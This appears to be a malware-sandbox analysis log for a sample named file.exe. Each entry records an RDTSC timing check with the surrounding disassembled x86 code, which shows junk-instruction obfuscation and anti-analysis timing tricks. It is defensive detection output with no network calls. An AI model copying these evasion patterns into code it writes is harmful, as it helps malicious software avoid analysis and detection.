            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0290 second address: 47C0296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0296 second address: 47C02AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6772h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02AC second address: 47C02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02B0 second address: 47C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FAD40FD6777h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FAD40FD6776h 0x00000015 push FFFFFFFEh 0x00000017 jmp 00007FAD40FD6770h 0x0000001c push 34B7A823h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FAD40FD676Ch 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C030D second address: 47C03A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov bx, 5710h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 4171366Bh 0x00000014 jmp 00007FAD40FC0C5Fh 0x00000019 push 0484B409h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FAD40FC0C65h 0x00000025 xor si, D846h 0x0000002a jmp 00007FAD40FC0C61h 0x0000002f popfd 0x00000030 mov cx, 12F7h 0x00000034 popad 0x00000035 xor dword ptr [esp], 71459F79h 0x0000003c jmp 00007FAD40FC0C5Ah 0x00000041 mov eax, dword ptr fs:[00000000h] 0x00000047 pushad 0x00000048 mov cx, EA3Dh 0x0000004c mov dl, ah 0x0000004e popad 0x0000004f push ecx 0x00000050 jmp 00007FAD40FC0C62h 0x00000055 mov dword ptr [esp], eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov eax, edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C03A4 second address: 47C03A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C03A9 second address: 47C044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 95h 0x00000005 mov edi, 2245F342h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 pushad 0x00000011 call 00007FAD40FC0C5Fh 0x00000016 pushfd 0x00000017 jmp 00007FAD40FC0C68h 0x0000001c sub si, 5408h 0x00000021 jmp 00007FAD40FC0C5Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 call 00007FAD40FC0C69h 0x0000002d jmp 00007FAD40FC0C60h 0x00000032 pop eax 0x00000033 popad 0x00000034 push ebp 0x00000035 jmp 00007FAD40FC0C5Eh 0x0000003a mov dword ptr [esp], ebx 0x0000003d pushad 0x0000003e mov cl, 2Eh 0x00000040 mov al, bh 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FAD40FC0C61h 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C044B second address: 47C055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, 3822h 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 jmp 00007FAD40FD6775h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FAD40FD676Ch 0x00000020 sub ecx, 7BE6DFE8h 0x00000026 jmp 00007FAD40FD676Bh 0x0000002b popfd 0x0000002c jmp 00007FAD40FD6778h 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FAD40FD676Bh 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FAD40FD6774h 0x00000040 sbb ax, B4A8h 0x00000045 jmp 00007FAD40FD676Bh 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007FAD40FD6778h 0x00000051 xor ecx, 38C5A708h 0x00000057 jmp 00007FAD40FD676Bh 0x0000005c popfd 0x0000005d popad 0x0000005e mov eax, dword ptr [75C74538h] 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 mov si, di 0x00000069 pushfd 0x0000006a jmp 00007FAD40FD6777h 0x0000006f adc ch, FFFFFFFEh 0x00000072 jmp 00007FAD40FD6779h 0x00000077 popfd 0x00000078 popad 0x00000079 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C055A second address: 47C05B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007FAD40FC0C68h 0x0000000c sbb ax, 9E28h 0x00000011 jmp 00007FAD40FC0C5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xor dword ptr [ebp-08h], eax 0x0000001d pushad 0x0000001e mov di, si 0x00000021 mov ebx, eax 0x00000023 popad 0x00000024 xor eax, ebp 0x00000026 pushad 0x00000027 mov cx, bx 0x0000002a mov ax, dx 0x0000002d popad 0x0000002e push edx 0x0000002f jmp 00007FAD40FC0C5Ch 0x00000034 mov dword ptr [esp], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05B7 second address: 47C05BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05BD second address: 47C05CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05CC second address: 47C05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD40FD676Ah 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05FB second address: 47C0670 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD40FC0C62h 0x00000008 add si, 87A8h 0x0000000d jmp 00007FAD40FC0C5Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 call 00007FAD40FC0C61h 0x00000025 call 00007FAD40FC0C60h 0x0000002a pop esi 0x0000002b pop ebx 0x0000002c mov ah, A8h 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FAD40FC0C65h 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0670 second address: 47C0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0676 second address: 47C067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C067C second address: 47C06B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000018h] 0x00000011 pushad 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 mov esi, 31560AC5h 0x0000001e popad 0x0000001f mov ecx, dword ptr [eax+00000FDCh] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06B8 second address: 47C06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06BC second address: 47C06C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06C2 second address: 47C06C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06C8 second address: 47C06CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06CC second address: 47C06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06DC second address: 47C06EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06EB second address: 47C06F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06F1 second address: 47C06F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0394 second address: 47B0399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0399 second address: 47B03FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FAD40FD676Fh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAD40FD6774h 0x00000019 add ax, 20D8h 0x0000001e jmp 00007FAD40FD676Bh 0x00000023 popfd 0x00000024 jmp 00007FAD40FD6778h 0x00000029 popad 0x0000002a sub esp, 2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B03FE second address: 47B0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0402 second address: 47B0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0408 second address: 47B043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD40FC0C67h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B043A second address: 47B0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0440 second address: 47B0444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0444 second address: 47B0448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0448 second address: 47B0460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD40FC0C5Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0460 second address: 47B0470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD676Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0470 second address: 47B0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0474 second address: 47B04B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FAD40FD6777h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAD40FD6779h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B04EC second address: 47B053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007FAD40FC0C5Dh 0x0000000b add al, 00000016h 0x0000000e jmp 00007FAD40FC0C61h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub ebx, ebx 0x00000019 pushad 0x0000001a mov eax, ebx 0x0000001c mov si, dx 0x0000001f popad 0x00000020 mov edi, 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAD40FC0C67h 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B053E second address: 47B0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6774h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0556 second address: 47B0570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 1Eh 0x00000011 mov cl, F9h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0570 second address: 47B0576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0576 second address: 47B0586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0586 second address: 47B058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B058A second address: 47B05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B05A3 second address: 47B05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAD40FD695Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B05C4 second address: 47B05C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B05C8 second address: 47B05DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B066D second address: 47B0688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0688 second address: 47B06AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FAD40FD676Ch 0x00000011 mov dword ptr [esp], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov esi, 4E0DAF2Fh 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B06E1 second address: 47B0798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD40FC0C64h 0x00000009 xor cx, A1E8h 0x0000000e jmp 00007FAD40FC0C5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jg 00007FADB242E9D5h 0x0000001d jmp 00007FAD40FC0C65h 0x00000022 js 00007FAD40FC0CDCh 0x00000028 pushad 0x00000029 mov edi, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FAD40FC0C66h 0x00000032 jmp 00007FAD40FC0C65h 0x00000037 popfd 0x00000038 jmp 00007FAD40FC0C60h 0x0000003d popad 0x0000003e popad 0x0000003f cmp dword ptr [ebp-14h], edi 0x00000042 jmp 00007FAD40FC0C60h 0x00000047 jne 00007FADB242E96Dh 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FAD40FC0C5Ah 0x00000056 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0798 second address: 47B079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B079C second address: 47B07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B07A2 second address: 47B0854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 jmp 00007FAD40FD6775h 0x00000018 popad 0x00000019 popad 0x0000001a lea eax, dword ptr [ebp-2Ch] 0x0000001d jmp 00007FAD40FD676Eh 0x00000022 xchg eax, esi 0x00000023 jmp 00007FAD40FD6770h 0x00000028 push eax 0x00000029 jmp 00007FAD40FD676Bh 0x0000002e xchg eax, esi 0x0000002f jmp 00007FAD40FD6776h 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FAD40FD676Dh 0x0000003e and cx, 99A6h 0x00000043 jmp 00007FAD40FD6771h 0x00000048 popfd 0x00000049 jmp 00007FAD40FD6770h 0x0000004e popad 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0854 second address: 47B08BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FAD40FC0C62h 0x00000010 movzx esi, dx 0x00000013 pop edx 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAD40FC0C68h 0x0000001d or ah, 00000008h 0x00000020 jmp 00007FAD40FC0C5Bh 0x00000025 popfd 0x00000026 mov edx, eax 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FAD40FC0C5Ch 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B08BA second address: 47B08BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B08BE second address: 47B08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B08C4 second address: 47B08FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAD40FD676Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD40FD6775h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B092E second address: 47B0934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0934 second address: 47B0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0938 second address: 47B0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov di, 8D2Ah 0x0000000f mov bh, 51h 0x00000011 popad 0x00000012 je 00007FADB242E961h 0x00000018 xor eax, eax 0x0000001a jmp 00007FAD40F9A38Ah 0x0000001f pop esi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 leave 0x00000023 retn 0004h 0x00000026 nop 0x00000027 cmp eax, 00000000h 0x0000002a setne cl 0x0000002d xor ebx, ebx 0x0000002f test cl, 00000001h 0x00000032 jne 00007FAD40FC0C57h 0x00000034 jmp 00007FAD40FC0DCBh 0x00000039 call 00007FAD44EF9EF5h 0x0000003e mov edi, edi 0x00000040 jmp 00007FAD40FC0C61h 0x00000045 xchg eax, ebp 0x00000046 jmp 00007FAD40FC0C5Eh 0x0000004b push eax 0x0000004c jmp 00007FAD40FC0C5Bh 0x00000051 xchg eax, ebp 0x00000052 pushad 0x00000053 mov dx, cx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0035 second address: 47B006D instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAD40FD6774h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD40FD6777h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B006D second address: 47B00D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAD40FC0C61h 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FAD40FC0C68h 0x0000001a adc eax, 74932088h 0x00000020 jmp 00007FAD40FC0C5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B00D1 second address: 47B00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0116 second address: 47B011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B011A second address: 47B0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0120 second address: 47B0D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d and bl, 00000001h 0x00000010 movzx eax, bl 0x00000013 lea esp, dword ptr [ebp-0Ch] 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 pop ebp 0x0000001a ret 0x0000001b add esp, 04h 0x0000001e jmp dword ptr [0088A41Ch+ebx*4] 0x00000025 push edi 0x00000026 call 00007FAD40FE6657h 0x0000002b push ebp 0x0000002c push ebx 0x0000002d push edi 0x0000002e push esi 0x0000002f sub esp, 000001D0h 0x00000035 mov dword ptr [esp+000001B4h], 0088CB10h 0x00000040 mov dword ptr [esp+000001B0h], 000000D0h 0x0000004b mov dword ptr [esp], 00000000h 0x00000052 mov eax, dword ptr [008881DCh] 0x00000057 call eax 0x00000059 mov edi, edi 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushfd 0x0000005f jmp 00007FAD40FC0C69h 0x00000064 jmp 00007FAD40FC0C5Bh 0x00000069 popfd 0x0000006a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0D55 second address: 47B0D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 call 00007FAD40FD6772h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0D72 second address: 47B0DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FAD40FC0C61h 0x0000000b xor ax, 31C6h 0x00000010 jmp 00007FAD40FC0C61h 0x00000015 popfd 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FAD40FC0C61h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAD40FC0C5Dh 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0DC3 second address: 47B0DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
